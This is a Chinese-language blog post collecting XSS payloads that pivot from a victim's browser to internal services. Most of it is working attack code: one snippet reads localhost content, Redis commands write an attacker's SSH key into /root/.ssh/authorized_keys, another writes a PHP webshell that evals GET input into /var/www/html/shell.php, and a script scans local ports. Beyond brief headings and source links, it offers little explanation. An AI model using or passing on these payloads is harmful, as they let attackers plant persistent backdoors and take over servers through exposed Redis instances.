XSS 相关 payload 集合

2022-11-25 18:32:09

Ajax 获取数据

GET

function loadXMLDoc()

{

    var xmlhttp;

    if (window.XMLHttpRequest){// code for IE7+, Firefox, Chrome, Opera, Safari

        xmlhttp=new XMLHttpRequest();

    }

    else{// code for IE6, IE5

        xmlhttp=new ActiveXObject("Microsoft.XMLHTTP");

    }

    xmlhttp.onreadystatechange=function(){

        if (xmlhttp.readyState==4 && xmlhttp.status==200){

            document.getElementById("out").innerHTML=xmlhttp.responseText;

        }

    }

    xmlhttp.open("GET","http://127.0.0.1:80/",true);

    xmlhttp.send();

}

var a =document.createElement("a");

a.id = "out";

bd = document.getElementsByTagName("body")[0];

bd.appendChild(a);

loadXMLDoc();

POST 写 redis

写 ssh 公钥

var keydir = "/root/.ssh";

var cmd = new XMLHttpRequest();

cmd.open("POST", "http://127.0.0.1:6379");

cmd.send('eval \'' + 'redis.call(\"set\", \"hacked\", "\\r\\n\\nssh-rsa AAAAB... virusdefender@LiYangs-MacBook-Pro.local\\n\\n\\n\\n\"); redis.call(\"config\", \"set\", \"dir\", \"' + keydir + '/\"); redis.call(\"config\", \"set\", \"dbfilename\", \"authorized_keys\"); ' + '\' 0' + "\r\n");

var cmd = new XMLHttpRequest();

cmd.open("POST", "http://127.0.0.1:6379");

cmd.send('save\r\n');

写 php webshell

<a id="flag">pwn</ a>

level=low_273eac1c

<script>

var xmlHttp;

if(window.XMLHttpRequest){

    xmlHttp = new XMLHttpRequest();

}

else{

    xmlHttp = newActiveXObject("Microsoft.XMLHTTP");

}

var formData = new FormData();

formData.append("0","flushall"+"\n"+"config set dir /var/www/html/"+"\n"+"config set dbfilename shell.php"+"\n"+'set 1 "\\n\\n<?php header(\'Access-Control-Allow-Origin:*\');eval($_GET[_]);?>\\n\\n"'+"\n"+"save"+"\n"+"quit");

xmlHttp.open("POST","http://127.0.0.1:6379",true);

xmlHttp.send(formData);

</script>

来源

https://xz.aliyun.com/t/2607#toc-2

https://strcpy.me/index.php/archives/751/

端口扫描

payload

var TagName = document.getElementsByTagName("body")[0];

ports=[443,80,81,88,6379,8000,8080,8088];

for(var i in ports){

    var script =   document.createElement("script");

    poc = "var data = '" + ports[i] + " OPEN; '; console.log(data);"

    script.setAttribute("src","http://127.0.0.1:" + ports[i]);

    script.setAttribute("onload", poc);

    TagName.appendChild(script);

}

来源

https://xz.aliyun.com/t/2607#toc-2
上一篇:Entity Framework7 入门之全功能.NET版本下使用EF7(含源码)另附数据迁移常见错误处理


下一篇:scrapy中的下载器中间件